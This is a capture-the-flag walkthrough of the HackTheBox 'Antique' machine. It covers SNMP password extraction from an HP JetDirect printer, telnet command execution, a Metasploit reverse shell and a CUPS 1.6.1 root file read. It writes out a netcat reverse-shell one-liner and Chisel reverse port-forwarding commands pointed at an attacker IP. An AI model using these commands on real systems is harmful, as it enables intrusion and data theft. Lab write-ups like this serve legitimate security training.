We covered a printer exploitation scenario where we started with telnet protocol then we used SNMP to grab the hex representation of the password through a vulnerability that targeted HP JetDirect printers. We got a telnet shell and from there we used the available commands to spawn a reverse shell along with Metasploit. We discovered a local printing service running on port 631 which as a vulnerability that enables full ability to read any file on the target system. We used Metasploit portforwarding to be able to access and interact with this service (CUPS 1.6.1). This was part of HackTheBox Antique

Initial Reconnaissance: Exploiting SNMP

My journey began with initial reconnaissance. I knew from an nmap scan (which I assumed was already done) that UDP port 161, used for Simple Network Management Protocol (SNMP), was open.

  • To interact with the printer via SNMP, I used the snmpwalk tool. I tried the common default “community string” of “public.”
  • My initial snmpwalk command helped me grab a banner, confirming it was an HP printer.
  • Then, I used a specific snmpwalk command (which targets an old vulnerability in some printers that store passwords in plain text) to extract information. This command returned a hexadecimal value.
  • I took this hex value to CyberChef, converted it from hex, and successfully revealed a plain text password! I learned that this particular exploit works on certain HP JetDirect printer models.

Gaining Initial Access: Telnet Login

The nmap scan also showed that the Telnet port (TCP 23) was open.

  • I connected to the machine using Telnet with the command: telnet <machine_IP>.
  • The Telnet banner confirmed it was an “HP JetDirect” printer, which aligned perfectly with my SNMP findings.
  • I used the password I had just obtained from the SNMP exploit to log in via Telnet.
  • Once logged in, typing ? showed me the available commands. I noticed an interesting exec command, which suggested I could execute system commands.
  • I tested this with exec id to confirm command execution, and it showed my user as “lp.”

Upgrading My Shell: Metasploit Magic

A basic Telnet shell isn’t ideal for extensive work, so I decided to upgrade to a more stable Metasploit Meterpreter shell.

  • I launched msfconsole.
  • I used the exploit/multi/script/web_delivery module.
  • I set the SRVHOST and LHOST options to my machine’s IP address.
  • Metasploit then generated a Python reverse shell command for me.
  • Back in my Telnet session, I executed this Python command (I had to prefix it with python3 for it to work correctly). This successfully gave me a Meterpreter session!
  • I also noted that alternatives like a Netcat or Bash reverse shell could have been used instead of Metasploit.

Privilege Escalation: Exploiting CUPS

From my Meterpreter session, I needed to escalate my privileges to root.

  • I dropped into a system shell using the shell command.
  • I navigated to /home/lp to grab the user flag.
  • During my enumeration (checking network connections with a command like netstat -tulnp), I discovered that port 631 was listening locally on the target machine. This port is used for the Common Unix Printing System (CUPS).
  • Since CUPS was only accessible locally on the target, I needed to set up port forwarding to access it from my attack machine.
  • Within my Metasploit Meterpreter session, I used the portfwd command: portfwd add -L 7000 -p 631 -r 127.0.0.1. This command forwarded connections from port 7000 on my machine to port 631 on the target’s localhost.
  • With port forwarding active, I opened a browser on my machine and navigated to http://127.0.0.1:7000, which displayed the CUPS web interface.
  • The CUPS page showed the version as 1.6.1.
  • I quickly searched for exploits for this CUPS version and found one that allows for root file read.
  • Back in msfconsole (after backgrounding my Meterpreter session), I searched for a post-exploitation module for CUPS: search type:post name:cups.
  • I selected the post/multi/escalate/cups_root_file_read module.
  • I set the SESSION option to the ID of my active Meterpreter session (which was 1).
  • Crucially, I changed the FILEPATH option from the default /etc/shadow to /root/root.txt to directly retrieve the root flag.
  • Running the exploit successfully read the root.txt file, and the contents (the flag!) were saved to a local file on my machine, with Metasploit providing the exact path.

Alternative Approaches (Beyond Metasploit)

I also considered how I could have achieved this without relying so heavily on Metasploit, which is useful for OSCP preparation:

  • For the reverse shell, instead of web_delivery, I could have used a standard Netcat reverse shell command, such as: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_IP> <your_port> >/tmp/f.
  • For port forwarding without Metasploit’s portfwd (and if SSH wasn’t an option), I could have used a tool called Chisel.
    • On my attacker machine, I’d set up the Chisel server: chisel server -p <chosen_port> --reverse.
    • On the target machine (as the client), I’d run: chisel client <attacker_IP>:<chisel_server_port> R:7000:127.0.0.1:631 (forwarding my local port 7000 to the target’s localhost port 631).
  • Once the port was forwarded with Chisel, I could then use a standalone exploit script for the CUPS vulnerability to read the root flag via the shell obtained from Netcat.

In essence, this machine was a fantastic demonstration of how chaining vulnerabilities in printer protocols like SNMP, and management interfaces like Telnet and CUPS, can lead to full system compromise.

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles